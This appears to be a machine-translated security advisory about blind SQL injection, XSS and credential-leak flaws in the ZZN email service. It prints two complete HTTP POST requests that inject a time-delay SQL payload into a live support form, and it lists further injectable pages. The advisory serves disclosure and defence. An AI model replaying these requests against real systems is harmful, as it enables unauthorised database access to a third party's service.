Release date:
Updated on:
Affected Systems:
Zzn
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2007-0177
ZZN is a VM email service.
ZZN has Multiple XSS, remote blind SQL injection, and credential leakage vulnerabilities. These vulnerabilities can cause remote attackers to execute unauthorized database operations.
<* Source: Juan Carlos García
Link: http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
1-URL encoded POST input company was set to x'; wait for delay '0: 0: 4 '--
POST/apsarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn = 3540123160.20480.0000; ASPSESSIONIDCACSTCRR = LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR = GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept :*/*
BeenThere = yeah & company = X % 27% 3b % 20 waitfor % 20 delay % 20% 270% 3a0% 3a2% 27% 20 -- % 20 & Complaint = secnight & Email = sample@email.tst & FirstName = secnight & inout = fromzzn & LastName = secnight & Phone = 555-666-0606 & RetURL = http % 3a % 2f % 2fwww.zzn.com
% 2fmembersarea_en & SpamCopy = & SpamEmail = sample@email.tst & VirtIP =
2-URL encoded POST input company was set to x'; wait for delay '0: 0: 4 '--
POST/apsarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn = 3540123160.20480.0000; ASPSESSIONIDCACSTCRR = LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR = GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept :*/*
BeenThere = yeah & company = X % 27% 3b % 20 waitfor % 20 delay % 20% 270% 3a0% 3a2% 27% 20 -- % 20 & Complaint = secnight & Email = sample@email.tst & FirstName = secnight & inout = fromzzn & LastName = secnight & Phone = 555-666-0606 & RetURL = http % 3a % 2f % 2fwww.zzn.com
% 2fmembersarea_en & SpamCopy = & SpamEmail = sample@email.tst & VirtIP =
Proof Of Concept
----------------
These files have at least one input (GET or POST ).
/Membersarea_en/home. asp-3 inputs
/Membersarea_en/joinframes. asp-2 inputs
/Membersarea_en/emailaccount. asp-4 inputs
/Membersarea_en/preminder. asp-1 inputs
/Membersarea_en/signup. asp-2 inputs
/Membersarea_en/support. asp-1 inputs
/Membersarea_en/insidelogin. asp-2 inputs
/Membersarea_en/directemailerror. asp-1 inputs
/Membersarea_en/alertwindow. asp-1 inputs
/Membersarea_en/loginerror. asp-1 inputs
/Membersarea_en/support_abuse.asp-1 inputs
/Membersarea_en/copy % 20of % 20emailaccount. asp-1 inputs
/Membersarea_en/directregister. asp-1 inputs
/Zlog-1 inputs
/Zlog/blog_error.asp-1 inputs
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Zzn
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.zzn.com